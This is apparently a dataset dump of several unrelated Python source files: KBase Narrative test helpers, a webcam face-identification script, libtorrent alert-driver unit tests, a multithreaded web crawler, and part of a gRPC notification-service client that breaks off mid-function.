source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
util.py | """
Test utility functions
"""
import logging
import pickle
import struct
import threading
import time
import unittest
import socketserver
import socket
import os
import json
import configparser
from contextlib import closing
from biokbase.narrative.common import util
from biokbase.workspace.client import Workspace
from biokbase.narrative.common.narrative_ref import NarrativeRef
__author__ = "Dan Gunter <dkgunter@lbl.gov>, Bill Riehl <wjriehl@lbl.gov>"
_log = logging.getLogger("kbtest")
_hnd = logging.StreamHandler()
_hnd.setFormatter(
logging.Formatter("[%(levelname)s] %(asctime)s %(name)s: %(message)s")
)
_log.addHandler(_hnd)
_log.setLevel(logging.DEBUG)
prod_ws = "https://kbase.us/services/ws"
ci_ws = "https://ci.kbase.us/services/ws"
ws_metadata = {"is_temporary": False, "narrative_nice_name": None}
_config_file = "test.cfg"
def test_logger(name):
return logging.getLogger("kbtest." + name)
class ConfigTests(object):
def __init__(self):
self._path_prefix = os.path.join(
os.environ["NARRATIVE_DIR"], "src", "biokbase", "narrative", "tests"
)
self._path_root = os.path.join(os.environ["NARRATIVE_DIR"])
config_file_path = self.file_path(_config_file)
self._config = configparser.ConfigParser()
self._config.read(config_file_path)
def get(self, *args, **kwargs):
return self._config.get(*args, **kwargs)
def get_path(self, *args, **kwargs):
from_root = False
if "from_root" in kwargs:
from_root = kwargs["from_root"]
del kwargs["from_root"]
val = self.get(*args, **kwargs)
return self.file_path(val, from_root)
def load_json_file(self, filename):
"""
Reads, parses, and returns as a dict, a JSON file.
The filename parameter is expected to be a path relative to this file's expected
location in <narrative_root>/src/biokbase/narrative/tests
"""
json_file_path = self.file_path(filename)
with open(json_file_path, "r") as f:
data = json.loads(f.read())
f.close()
return data
def file_path(self, filename, from_root=False):
"""
Returns the path to the filename, relative to this file's expected location.
<narrative root>/src/biokbase/narrative/tests
"""
if from_root:
return os.path.join(self._path_root, filename)
else:
return os.path.join(self._path_prefix, filename)
def fetch_narrative(nar_id, auth_token, url=ci_ws, file_name=None):
"""
Fetches a Narrative object with the given reference id (of the form ##/##).
If a file_name is given, then it is printed to that file.
If the narrative is found, the jsonized string of it is returned.
If nothing is found, an empty Dict is returned.
"""
ws_client = Workspace(url=url, token=auth_token)
nar_data = ws_client.get_objects([{"ref": nar_id}])
if len(nar_data) > 0:
nar_json = json.dumps(nar_data[0])
if file_name is not None:
f = open(file_name, "w")
f.write(nar_json)
f.close()
return nar_json
return {}
def upload_narrative(nar_file, auth_token, user_id, url=ci_ws, set_public=False):
"""
Uploads a Narrative from a downloaded object file.
This file needs to be in JSON format, and it expects all
data and info that is usually returned by the Workspace.get_objects
method.
Returns a dict of three elements:
ws: the id of the workspace that was created
obj: the id of the narrative object
ref: the above two joined together into an object ref (for convenience)
"""
# read the file
f = open(nar_file, "r")
nar = json.loads(f.read())
f.close()
# do some setup.
current_nar_metadata = ws_metadata
current_nar_metadata["narrative_nice_name"] = nar["data"]["metadata"]["name"]
ws_client = Workspace(url=url, token=auth_token)
# create the new workspace for the narrative
ws_info = ws_client.create_workspace(
{
"workspace": "{}:{}".format(user_id, str(time.time()).replace(".", "")),
"meta": current_nar_metadata,
"globalread": "r" if set_public else "n",
}
)
ws_id = ws_info[0]
# setup and save the narrative object
nar["info"][10]
ws_save_obj = {
"type": "KBaseNarrative.Narrative",
"data": nar["data"],
"name": nar["info"][1],
"meta": nar["info"][10],
"provenance": [
{
"script": "upload_narrative_test.py",
"description": "Temporary Narrative uploaded for automated testing",
}
],
}
obj_info = ws_client.save_objects({"id": ws_id, "objects": [ws_save_obj]})
# tweak the workspace's metadata to properly present its narrative
ws_client.alter_workspace_metadata(
{"wsi": {"id": ws_id}, "new": {"narrative": obj_info[0][0]}}
)
return {
"ws": ws_info[0],
"obj": obj_info[0][0],
"refstr": "{}/{}".format(ws_info[0], obj_info[0][0]),
"ref": NarrativeRef({"wsid": ws_info[0], "objid": obj_info[0][0]}),
}
def delete_narrative(ws_id, auth_token, url=ci_ws):
"""
Deletes a workspace with the given id. Throws a ServerError if the user given
by auth_token isn't allowed to do so.
"""
ws_client = Workspace(url=url, token=auth_token)
ws_client.delete_workspace({"id": ws_id})
def read_token_file(path):
"""
Reads in a token file.
A token file is just expected to have a single line in it - the token itself.
"""
if not os.path.isfile(path):
return None
else:
with open(path, "r") as f:
token = f.read().strip()
f.close()
return token
def read_json_file(path):
"""
Generically reads in any JSON file and returns it as a dict.
Especially intended for reading a Narrative file.
"""
with open(path, "r") as f:
data = json.loads(f.read())
f.close()
return data
class MyTestCase(unittest.TestCase):
def test_kvparse(self):
for input, text, kvp in (
("foo", "foo", {}),
("name=val", "", {"name": "val"}),
("a name=val boy", "a boy", {"name": "val"}),
):
rkvp = {}
rtext = util.parse_kvp(input, rkvp)
self.assertEqual(
text,
rtext,
"Text '{}' does not match "
"result '{}' "
"from input '{}'".format(text, rtext, input),
)
self.assertEqual(
text,
rtext,
"Dict '{}' does not match "
"result '{}' "
"from input '{}'".format(kvp, rkvp, input),
)
class SocketServerBuf(socketserver.TCPServer):
allow_reuse_address = True
def __init__(self, addr, handler):
socketserver.TCPServer.__init__(self, addr, handler)
self.buf = ""
def get_data(self):
"""Get current buffer and clear it."""
data, self.buf = self.buf, ""
return data
def server_close(self):
self.socket.close()
def recvall(socket, n, timeout=0):
buf, m, t = b"", 0, time.time()
while m < n:
if timeout > 0 and (time.time() - t > timeout):
raise RuntimeError("Timeout")
b = socket.recv(n - m)
if b:
buf += b
m += len(b)
# print("@@ recv {}".format(len(b)))
else:
time.sleep(0.1)
# print("@@ recv 0/{}".format(n - m))
return buf
class LogProxyMessageBufferer(socketserver.BaseRequestHandler):
def handle(self):
self.request.settimeout(1)
while True:
try:
hdr = self.request.recv(4)
except Exception:
return
if not hdr:
return
size = struct.unpack(">L", hdr)[0]
# print("@@ body {}".format(size))
if size < 65536:
chunk = recvall(self.request, size, timeout=1)
record = pickle.loads(chunk)
# print("@@ message <{}>".format(record['msg']))
self.server.buf += record["msg"]
class NarrativeMessageBufferer(socketserver.StreamRequestHandler):
def handle(self):
# self.rfile is a file-like object created by the handler;
# we can now use e.g. readline() instead of raw recv() calls
self.data = self.rfile.readline().strip()
# print("{} wrote:".format(self.client_address[0]))
# print(self.data)
self.server.buf += self.data.decode("utf-8")
def start_tcp_server(host, port, poll_interval, bufferer=LogProxyMessageBufferer):
_log.info("Starting server on {}:{}".format(host, port))
server = SocketServerBuf((host, port), bufferer)
thr = threading.Thread(target=server.serve_forever, args=[poll_interval])
thr.daemon = True
thr.start()
return server, thr
def stop_tcp_server(server, thr):
_log.info("Stopping server")
server.shutdown()
thr.join()
_log.info("Stopped server")
server.server_close()
_log.info("Closed server")
def find_free_port() -> int:
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
s.bind(("", 0))
return s.getsockname()[1]
def validate_job_state(state: dict) -> None:
"""
Validates the structure and entries in a job state as returned by the JobManager.
If any keys are missing, or extra keys exist, or values are weird, then this
raises an AssertionError.
"""
# list of tuples - first = key name, second = value type
# details for other cases comes later. This is just the expected basic set of
# keys for EVERY job, once it's been created in EE2.
expected_state_keys = [
("job_id", str),
("status", str),
("created", int),
("updated", int),
("run_id", str),
("cell_id", str),
]
optional_state_keys = [
("queued", int),
("finished", int),
("terminated_code", int),
("parent_job_id", str),
("errormsg", str),
("error", dict),
("error_code", int),
]
assert "state" in state, "state key missing"
assert isinstance(state["state"], dict), "state is not a dict"
assert "owner" in state, "owner key missing"
assert isinstance(state["owner"], str), "owner is not a string"
for k in expected_state_keys:
assert k[0] in state["state"], f"{k[0]} key is missing from state"
assert isinstance(state["state"][k[0]], k[1]), f"{k[0]} is not a {k[1]}"
for k in optional_state_keys:
if k in state["state"]:
assert isinstance(
state["state"][k[0]], (k[1], None)
), f"Optional key {k[0]} is present and not {k[1]} or None"
if __name__ == "__main__":
unittest.main()
|
Original.py | # -*- coding: utf-8 -*-
"""
Created on Wed Oct 24 04:19:09 2018
@author: Mikko Pohja
"""
import os
import sys
import cv2
import dlib
import numpy as np
import time
import threading
import glob
from skimage import io
face_recognition = dlib.face_recognition_model_v1('./models/dlib_face_recognition_resnet_model_v1.dat')
face_detector = dlib.get_frontal_face_detector()
shape_predictor = dlib.shape_predictor('./models/shape_predictor_68_face_landmarks.dat')
enrolled_faces = {}
# Semaphor for identifying thread
identifying = False
def face_to_vector(image, face):
return (
np
.array(face_recognition.compute_face_descriptor(image, face))
.astype(float)
)
def faces_from_image(image):
UPSAMPLING_FACTOR = 0
faces = [
(face.height() * face.width(), shape_predictor(image, face))
for face in face_detector(image, UPSAMPLING_FACTOR)
]
return [face for _, face in sorted(faces, reverse=True)]
def image_from_file(path):
return io.imread(path)
def identify(image):
# Get all faces
faces = faces_from_image(image)
# Pick largest face
face = faces[0] if faces else None
# Calculate face descriptor
descriptor = face_recognition.compute_face_descriptor(image, face)
face_vector = np.array(descriptor).astype(float)
# THIS is probably hazardous as ordering may not be always the same?
enroll_identifiers = np.array(list(enrolled_faces.keys()))
enroll_matrix = np.array(list(enrolled_faces.values()))
# Calculate differences between the face and all enrolled faces
differences = np.subtract(np.array(enroll_matrix), face_vector)
distances = np.linalg.norm(differences, axis=1)
# and pick the closest one
closest_index = np.argmin(distances)
return enroll_identifiers[closest_index], distances[closest_index]
def handle_frame(origFrame, cb):
global identifying
try:
frame = cv2.resize(origFrame, None, fx=0.5, fy=0.5, interpolation=cv2.INTER_CUBIC)
start = time.time()
identifier, distance = identify(frame)
if (distance < 0.6):
cb(identifier, distance, time.time() - start)
else:
cb('-', distance, time.time() - start)
sys.stdout.flush()
except Exception as e:
exc = e
cb(None, 0, time.time() - start)
# print(e)
identifying = False
def webcam(cb):
global identifying
video_capture = cv2.VideoCapture(0)
while True:
video_capture.grab()
if (not identifying):
ret, frame = video_capture.retrieve()
if (ret == False):
print('No frame')
break
identifying = True
thread = threading.Thread(target=handle_frame, args=(frame, cb))
thread.daemon=True
thread.start()
# When everything is done, release the capture
video_capture.release()
def load_enrolled_faces():
global enrolled_faces
enrolled_faces = np.load('faces.npy').item()
def enroll_face(image, name):
try:
# find face
faces = faces_from_image(image)
# Pick largest face
face = faces[0] if faces else None
# face to vector
face_vector = face_to_vector(image, face)
# save to enrolled faces list
enrolled_faces[name] = face_vector
# save npy file
except Exception as e:
print('Unable to enroll', name)
print(e)
def logger(identifier, distance, duration):
if (identifier == '-'):
print('Unknown person', duration)
elif (identifier == None):
print('No face', duration)
else:
print(identifier, distance, duration)
def enrollImages():
print('Enrolling all images')
for filename in glob.glob('faces/*.jpg'):
print(filename)
name = filename.split('/')[1].split('.')[0]
image = image_from_file(filename)
enroll_face(image, name)
print('Enrolled', name)
np.save('faces.npy', enrolled_faces)
print('Saved faces.npy')
if (not os.path.isfile('faces.npy')):
enrollImages()
else:
print('Loading enrolled faces from faces.npy')
load_enrolled_faces()
webcam(logger)
|
alertdriver_test.py | # Copyright (c) 2020 AllSeeingEyeTolledEweSew
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
# AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,
# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR
# OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
# PERFORMANCE OF THIS SOFTWARE.
import concurrent.futures
import contextlib
import gc
import tempfile
import threading
from typing import Iterator
from typing import List
from typing import Optional
from typing import Type
import unittest
import libtorrent as lt
from tvaf import driver as driver_lib
from tvaf import session as session_lib
from tvaf import util
from . import lib
from . import tdummy
@contextlib.contextmanager
def make_some_alerts() -> Iterator[List[lt.alert]]:
session = lib.create_isolated_session_service(
alert_mask=lt.alert_category.session_log
).session
alert = session.wait_for_alert(10000)
assert alert is not None
alerts = session.pop_alerts()
yield alerts
# NB: session stays alive until the context exits, because this stack frame
# references it
def executor() -> concurrent.futures.ThreadPoolExecutor:
return concurrent.futures.ThreadPoolExecutor()
# NB: We'd like to test that iterators don't hold any unintended references to
# alerts, but this is hard to test because exceptions refer to stack frames
# which refer to alerts in many cases, including StopIteration.
class IteratorTest(unittest.TestCase):
def test_close_inline_is_safe(self) -> None:
iterator = driver_lib.Iterator()
def iterate_and_close() -> None:
for _ in iterator:
iterator.close()
future = executor().submit(iterate_and_close)
with make_some_alerts() as alerts:
iterator.feed(*alerts)
future.result()
self.assertTrue(iterator.is_closed())
# We exited naturally, so we should be marked safe
self.assertTrue(iterator.is_safe())
def test_break_context_manager_is_safe(self) -> None:
iterator = driver_lib.Iterator()
def iterate_and_close() -> None:
with iterator:
for _ in iterator:
break
future = executor().submit(iterate_and_close)
with make_some_alerts() as alerts:
iterator.feed(*alerts)
future.result()
self.assertTrue(iterator.is_closed())
# We exited from a context manager, so we should be marked safe
self.assertTrue(iterator.is_safe())
def test_visit_order(self) -> None:
iterator = driver_lib.Iterator()
def iterate_and_close() -> str:
for alert in iterator:
message = alert.message()
iterator.close()
return message
raise AssertionError("unreachable")
future = executor().submit(iterate_and_close)
with make_some_alerts() as alerts:
iterator.feed(*alerts)
expected_message = alerts[0].message()
self.assertEqual(future.result(), expected_message)
def test_feed_marks_unsafe(self) -> None:
iterator = driver_lib.Iterator()
with make_some_alerts() as alerts:
result = iterator.feed(*alerts)
self.assertTrue(result)
self.assertFalse(iterator.is_safe())
def test_feed_empty_not_unsafe(self) -> None:
iterator = driver_lib.Iterator()
result = iterator.feed()
self.assertFalse(result)
self.assertTrue(iterator.is_safe())
def test_feed_after_close(self) -> None:
iterator = driver_lib.Iterator()
iterator.close()
with make_some_alerts() as alerts:
result = iterator.feed(*alerts)
self.assertFalse(result)
self.assertTrue(iterator.is_safe())
def test_close(self) -> None:
iterator = driver_lib.Iterator()
iterator.close()
self.assertTrue(iterator.is_closed())
with self.assertRaises(StopIteration):
next(iterator)
def test_close_twice(self) -> None:
iterator = driver_lib.Iterator()
iterator.close()
iterator.close(Exception())
self.assertTrue(iterator.is_closed())
with self.assertRaises(StopIteration):
next(iterator)
def test_safe(self) -> None:
iterator = driver_lib.Iterator()
with make_some_alerts() as alerts:
iterator.feed(*alerts)
iterator.close()
self.assertFalse(iterator.is_safe())
iterator.set_safe()
self.assertTrue(iterator.is_safe())
def test_safe_without_close(self) -> None:
iterator = driver_lib.Iterator()
with make_some_alerts() as alerts:
iterator.feed(*alerts)
with self.assertRaises(ValueError):
iterator.set_safe()
def test_safe_notify(self) -> None:
iterator = driver_lib.Iterator()
rfile, wfile = util.selectable_pipe()
iterator.set_notify_safe_file(wfile)
with make_some_alerts() as alerts:
iterator.feed(*alerts)
iterator.close()
# Not safe, not notified
self.assertFalse(iterator.is_safe())
self.assertEqual(rfile.read(), None)
iterator.set_safe()
# We become safe, and should be notified
self.assertTrue(iterator.is_safe())
self.assertNotEqual(rfile.read(), None)
# Second call to set_safe shouldn't notify again
iterator.set_safe()
self.assertEqual(rfile.read(), None)
def test_safe_notify_return(self) -> None:
iterator = driver_lib.Iterator()
_, wfile = util.selectable_pipe()
initial = iterator.set_notify_safe_file(wfile)
self.assertEqual(initial, None)
previous = iterator.set_notify_safe_file(None)
self.assertEqual(previous, wfile)
class Pumper(threading.Thread):
def __init__(self, driver: driver_lib.AlertDriver):
super().__init__()
self.driver = driver
self.stopped = threading.Event()
def run(self) -> None:
while not self.stopped.is_set():
self.driver.pump_alerts()
def shutdown(self) -> None:
self.stopped.set()
self.join()
class PumpAlertsConcurrencyTest(unittest.TestCase):
def setUp(self) -> None:
self.tempdir = tempfile.TemporaryDirectory()
def tearDown(self) -> None:
self.tempdir.cleanup()
def do_concurrency_test(self, flags) -> None:
session_service = lib.create_isolated_session_service()
session = session_service.session
driver = driver_lib.AlertDriver(session_service=session_service)
pumper = Pumper(driver)
# Do some combination of possible concurrent things
if flags & 1:
driver.pump_alerts()
iterator = driver.iter_alerts(
lt.alert_category.status, lt.add_torrent_alert
)
if flags & 2:
driver.pump_alerts()
atp = tdummy.DEFAULT.atp()
atp.save_path = self.tempdir.name
session.async_add_torrent(atp)
pumper.start()
saw_add_alert = False
with iterator:
for alert in iterator:
if isinstance(alert, lt.add_torrent_alert):
saw_add_alert = True
break
raise AssertionError(f"saw unexpected {alert}")
self.assertTrue(saw_add_alert)
pumper.shutdown()
def test_concurrency(self) -> None:
for flags in range(4):
self.do_concurrency_test(flags)
class IterAlertsTest(unittest.TestCase):
def setUp(self) -> None:
self.config = lib.create_isolated_config()
# Always enable session log, for iterator tests requiring alerts
self.session_service = session_lib.SessionService(
config=self.config, alert_mask=lt.alert_category.session_log
)
self.session = self.session_service.session
self.driver = driver_lib.AlertDriver(
session_service=self.session_service
)
self.pumper = Pumper(self.driver)
self.tempdir = tempfile.TemporaryDirectory()
def tearDown(self) -> None:
self.tempdir.cleanup()
def test_iter_alerts(self) -> None:
iterator = self.driver.iter_alerts(
lt.alert_category.status, lt.add_torrent_alert
)
atp = tdummy.DEFAULT.atp()
atp.save_path = self.tempdir.name
self.session.async_add_torrent(atp)
self.pumper.start()
saw_add_alert = False
with iterator:
for alert in iterator:
if isinstance(alert, lt.add_torrent_alert):
saw_add_alert = True
break
raise AssertionError(f"saw unexpected {alert}")
self.assertTrue(saw_add_alert)
self.pumper.shutdown()
def test_fork_with_handle(self) -> None:
self.pumper.start()
iterator = self.driver.iter_alerts(
lt.alert_category.status, lt.add_torrent_alert
)
# Trigger add and remove
atp = tdummy.DEFAULT.atp()
atp.save_path = self.tempdir.name
handle = self.session.add_torrent(atp)
self.session.remove_torrent(handle)
forkee_saw_types: List[Type[lt.alert]] = []
forkee: Optional[threading.Thread] = None
def watch_handle(handle_iterator: driver_lib.Iterator) -> None:
with handle_iterator:
for alert in handle_iterator:
forkee_saw_types.append(alert.__class__)
if isinstance(alert, lt.torrent_removed_alert):
break
with iterator:
for alert in iterator:
if isinstance(alert, lt.add_torrent_alert):
# Fork a task to watch add and remove alerts on this handle
handle_iterator = self.driver.iter_alerts(
lt.alert_category.status,
lt.add_torrent_alert,
lt.torrent_removed_alert,
handle=alert.handle,
start=alert,
)
forkee = threading.Thread(
target=watch_handle, args=(handle_iterator,)
)
forkee.start()
break
raise AssertionError(f"saw unexpected {alert}")
assert forkee is not None
forkee.join()
self.assertTrue(
forkee_saw_types, [lt.add_torrent_alert, lt.torrent_removed_alert]
)
self.pumper.shutdown()
def test_dead_iterator_detection(self) -> None:
iterator = self.driver.iter_alerts(lt.alert_category.session_log)
# Feed iterator some alerts
self.driver.pump_alerts()
self.assertFalse(iterator.is_safe())
# Let iterator die without closing
del iterator
# Not necessary as of writing, but good defense
gc.collect()
# Should detect the dead iterator, and eventually proceed
self.driver.pump_alerts()
# NB: This test may fail for reasons that are meaningless in production
# (I saw pytest's logger hold a reference due to log("%s", iterator)),
# but I still think this test is useful as I want to catch *any*
# unexpected references, so dead iterator protection works as well as
# it can
def test_checkpoint_timeout(self) -> None:
iterator = self.driver.iter_alerts(lt.alert_category.session_log)
# Feed iterator some alerts
self.driver.pump_alerts()
self.assertFalse(iterator.is_safe())
# Second pump should wait for a checkpoint after the first pump, which
# never comes
with self.assertRaises(driver_lib.CheckpointTimeout):
self.driver.pump_alerts(timeout=0.1)
class DriverTest(unittest.TestCase):
def setUp(self) -> None:
self.session_service = lib.create_isolated_session_service()
self.driver = driver_lib.AlertDriver(
session_service=self.session_service
)
def test_start_and_close(self) -> None:
self.driver.start()
iterator = self.driver.iter_alerts(lt.alert_category.session_log)
# Consume iterator
future = executor().submit(list, iterator)
self.driver.terminate()
with self.assertRaises(driver_lib.DriverShutdown):
future.result()
self.driver.join()
# Further iter_alerts should fail
with self.assertRaises(driver_lib.DriverShutdown):
self.driver.iter_alerts(lt.alert_category.session_log)
|
main.py | import threading
from queue import Queue
from spider import Spider
from domain import *
from general import *
PROJECT_NAME = 'calstatela'
HOMEPAGE = 'http://calstatela.edu/'
DOMAIN_NAME = get_domain_name(HOMEPAGE)
QUEUE_FILE = PROJECT_NAME + '/queue.txt'
CRAWLED_FILE = PROJECT_NAME + '/crawled.txt'
CRAWLED_DICT_FILE = PROJECT_NAME + 'crawledDict.txt'
NUMBER_OF_THREADS = 8
queue = Queue()
Spider(PROJECT_NAME, HOMEPAGE, DOMAIN_NAME)
# Create worker threads (will die when main exits)
def create_workers():
for _ in range(NUMBER_OF_THREADS):
t = threading.Thread(target=work)
t.daemon = True
t.start()
# Do the next job in the queue
def work():
while True:
url = queue.get()
Spider.crawl_page(threading.current_thread().name, url)
queue.task_done()
# Each queued link is a new job
def create_jobs():
for link in file_to_set(QUEUE_FILE):
queue.put(link)
queue.join()
crawl()
# Check if there are items in the queue, if so crawl them
def crawl():
queued_links = file_to_set(QUEUE_FILE)
if len(queued_links) > 0:
print(str(len(queued_links)) + ' links in the queue')
create_jobs()
create_workers()
crawl()
|
client.py | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import logging
import threading
import os
import uuid
from collections import Iterable
from functools import wraps
from random import shuffle
from typing import Union, List, Tuple, Dict, Any
import grpc
import time
from notification_service.base_notification import BaseNotification, EventWatcher, BaseEvent, EventWatcherHandle
from notification_service.proto.notification_service_pb2 \
import SendEventRequest, ListEventsRequest, EventProto, ReturnStatus, ListAllEventsRequest, \
GetLatestVersionByKeyRequest, ListMembersRequest
from notification_service.proto import notification_service_pb2_grpc
from notification_service.util.utils import event_proto_to_event, proto_to_member, sleep_and_detecting_running
if not hasattr(time, 'time_ns'):
time.time_ns = lambda: int(time.time() * 1e9)
NOTIFICATION_TIMEOUT_SECONDS = os.environ.get("NOTIFICATION_TIMEOUT_SECONDS", 5)
ALL_EVENTS_KEY = "_*"
class ThreadEventWatcherHandle(EventWatcherHandle):
def __init__(self,
thread: threading.Thread,
thread_key: Any,
notification_client: 'NotificationClient'):
self._thread = thread
self._thread_key = thread_key
self._notification_client = notification_client
def stop(self):
self._thread._flag = False
self._thread.join()
self._notification_client.lock.acquire()
try:
self._notification_client.threads[self._thread_key].remove(self._thread)
finally:
self._notification_client.lock.release()
class NotificationClient(BaseNotification):
"""
NotificationClient is the notification client.
"""
def __init__(self,
server_uri: str,
default_namespace: str = None,
enable_ha: bool = False,
list_member_interval_ms: int = 5000,
retry_interval_ms: int = 1000,
retry_timeout_ms: int = 10000):
"""
The constructor of the NotificationClient.
:param server_uri: Target server uri/uris. If `enable_ha` is True, multiple uris separated
by "," can be accepted.
:param default_namespace: The default namespace that this client is working on.
:param enable_ha: Enable high-available functionality.
:param list_member_interval_ms: When `enable_ha` is True, this client will request the
living members periodically. A member means a server node
of the Notification server cluster. This param specifies
the interval of the listing member requests.
:param retry_interval_ms: When `enable_ha` is True and a rpc call has failed on all the
living members, this client will retry until success or timeout.
This param specifies the retry interval.
:param retry_timeout_ms: When `enable_ha` is True and a rpc call has failed on all the
living members, this client will retry until success or timeout.
This param specifies the retry timeout.
"""
channel = grpc.insecure_channel(server_uri)
self._default_namespace = default_namespace
self.notification_stub = notification_service_pb2_grpc.NotificationServiceStub(channel)
self.threads = {} # type: Dict[Any, List[threading.Thread]]
self.lock = threading.Lock()
self.enable_ha = enable_ha
self.list_member_interval_ms = list_member_interval_ms
self.retry_interval_ms = retry_interval_ms
self.retry_timeout_ms = retry_timeout_ms
if self.enable_ha:
server_uris = server_uri.split(",")
self.living_members = []
self.current_uri = None
last_error = None
for server_uri in server_uris:
channel = grpc.insecure_channel(server_uri)
notification_stub = notification_service_pb2_grpc.NotificationServiceStub(channel)
try:
request = ListMembersRequest(timeout_seconds=0)
response = notification_stub.listMembers(request)
if response.return_code == ReturnStatus.SUCCESS:
self.living_members = [proto_to_member(proto).server_uri
for proto in response.members]
else:
raise Exception(response.return_msg)
self.current_uri = server_uri
self.notification_stub = notification_stub
break
except grpc.RpcError as e:
last_error = e
if self.current_uri is None:
raise Exception("No available server uri!") from last_error
self.ha_change_lock = threading.Lock()
self.ha_running = True
self.notification_stub = self._wrap_rpcs(self.notification_stub, server_uri)
self.list_member_thread = threading.Thread(target=self._list_members, daemon=True)
self.list_member_thread.start()
def send_event(self, event: BaseEvent):
"""
Send event to Notification Service.
:param event: the event updated.
:return: The created event which has version and create time.
"""
request = SendEventRequest(
event=EventProto(
key=event.key,
value=event.value,
event_type=event.event_type,
context=event.context,
namespace=self._default_namespace if event.namespace is None else event.namespace),
uuid=str(uuid.uuid4()))
response = self.notification_stub.sendEvent(request)
if response.return_code == ReturnStatus.SUCCESS:
return event_proto_to_event(response.event)
else:
raise Exception(response.return_msg)
def list_events(self,
key: Union[str, List[str]],
namespace: str = None,
version: int = None,
event_type: str = None,
start_time: int = None) -> List[BaseEvent]:
"""
List specific events in Notification Service.
:param key: Key of the event for listening.
:param namespace: Namespace of the event for listening.
:param version: (Optional) The version of the events must greater than this version.
:param event_type: (Optional) Type of the events.
:param start_time: (Optional) Start time of the events.
:return: The event list.
"""
if isinstance(key, str):
key = (key,)
elif isinstance(key, Iterable):
key = tuple(key)
request = ListEventsRequest(
keys=key,
start_version=version,
event_type=event_type,
start_time=start_time,
namespace=self._default_namespace if namespace is None else namespace)
response = self.notification_stub.listEvents(request)
if response.return_code == ReturnStatus.SUCCESS:
if response.events is None:
return []
else:
events = []
for event_proto in response.events:
event = event_proto_to_event(event_proto)
events.append(event)
return events
else:
raise Exception(response.return_msg)
def start_listen_event(self,
key: Union[str, Tuple[str]],
watcher: EventWatcher,
namespace: str = None,
version: int = None,
event_type: str = None,
start_time: int = None) -> EventWatcherHandle:
"""
Start listen specific `key` or `version` notifications in Notification Service.
:param key: Key of notification for listening.
:param watcher: Watcher instance for listening.
:param namespace: Namespace of the event for listening.
:param version: (Optional) The version of the events must greater than this version.
:param event_type: (Optional) Type of the events for listening.
:param start_time: (Optional) Start time of the events for listening.
:return: The handle used to stop the listening.
"""
if isinstance(key, str):
key = (key,)
elif isinstance(key, Iterable):
key = tuple(key)
namespace = self._default_namespace if namespace is None else namespace
def list_events(client,
k: Tuple[str],
v: List[int],
t: str = None,
ts: int = None,
ns: str = None,
timeout_seconds: int = None):
request = ListEventsRequest(
keys=k,
event_type=t,
start_time=ts,
start_version=v,
timeout_seconds=timeout_seconds,
namespace=ns)
response = client.notification_stub.listEvents(request)
if response.return_code == ReturnStatus.SUCCESS:
if response.events is None:
return None
else:
events = []
for event_proto in response.events:
event = event_proto_to_event(event_proto)
events.append(event)
return events
else:
raise Exception(response.return_msg)
def listen(client, k, v, t, ts, ns, w):
th = threading.current_thread()
listen_version = v
while getattr(th, '_flag', True):
notifications = list_events(
client,
k,
listen_version,
t,
ts,
ns,
NOTIFICATION_TIMEOUT_SECONDS)
if len(notifications) > 0:
w.process(notifications)
listen_version = notifications[len(notifications) - 1].version
thread = threading.Thread(
target=listen,
args=(self, key, version, event_type, start_time, namespace,
watcher),
daemon=True)
thread.start()
self.lock.acquire()
try:
if self.threads.get((key, namespace)) is None:
self.threads[(key, namespace)] = []
self.threads[(key, namespace)].append(thread)
finally:
self.lock.release()
return ThreadEventWatcherHandle(thread, (key, namespace), self)
def stop_listen_event(self, key: Union[str, Tuple[str]] = None, namespace: str = None):
"""
Stop listen specific `key` notifications in Notification Service.
:param key: Keys of notification for listening.
:param namespace: Namespace of notification for listening.
"""
namespace = self._default_namespace if namespace is None else namespace
if key is None:
for (thread_key, v) in self.threads.items():
if thread_key == ALL_EVENTS_KEY:
# do not stop the global listen threads,
# which are controlled by `stop_listen_events`.
continue
threads = self.threads[thread_key]
for thread in threads:
thread._flag = False
thread.join()
self.threads.clear()
else:
self.lock.acquire()
if isinstance(key, str):
key = (key,)
try:
if (key, namespace) in self.threads:
threads = self.threads[(key, namespace)]
for thread in threads:
thread._flag = False
thread.join()
del self.threads[(key, namespace)]
finally:
self.lock.release()
def list_all_events(self,
start_time: int = None,
start_version: int = None,
end_version: int = None) -> List[BaseEvent]:
"""
List specific `key` or `version` of events in Notification Service.
:param start_time: (Optional) Start time of the events.
:param start_version: (Optional) the version of the events must greater than the
start_version.
:param end_version: (Optional) the version of the events must equal or less than the
end_version.
:return: The event list.
"""
request = ListAllEventsRequest(start_time=start_time,
start_version=start_version,
end_version=end_version)
response = self.notification_stub.listAllEvents(request)
if response.return_code == ReturnStatus.SUCCESS:
if response.events is None:
return []
else:
events = []
for event_proto in response.events:
event = event_proto_to_event(event_proto)
events.append(event)
return events
else:
raise Exception(response.return_msg)
def start_listen_events(self,
watcher: EventWatcher,
start_time=int(time.time() * 1000),
version: int = None) -> EventWatcherHandle:
"""
Start listen all events.
:param watcher: process event.
:param start_time: (Optional) the earliest event time.
:param version: (Optional) the start version of the event.
:return: The handle used to stop the listening.
"""
if ALL_EVENTS_KEY in self.threads:
raise Exception("already listen events, must stop first!")
def list_events(client, start, timeout_seconds: int = None):
request = ListAllEventsRequest(start_time=start, timeout_seconds=timeout_seconds)
response = client.notification_stub.listAllEvents(request)
if response.return_code == ReturnStatus.SUCCESS:
if response.events is None:
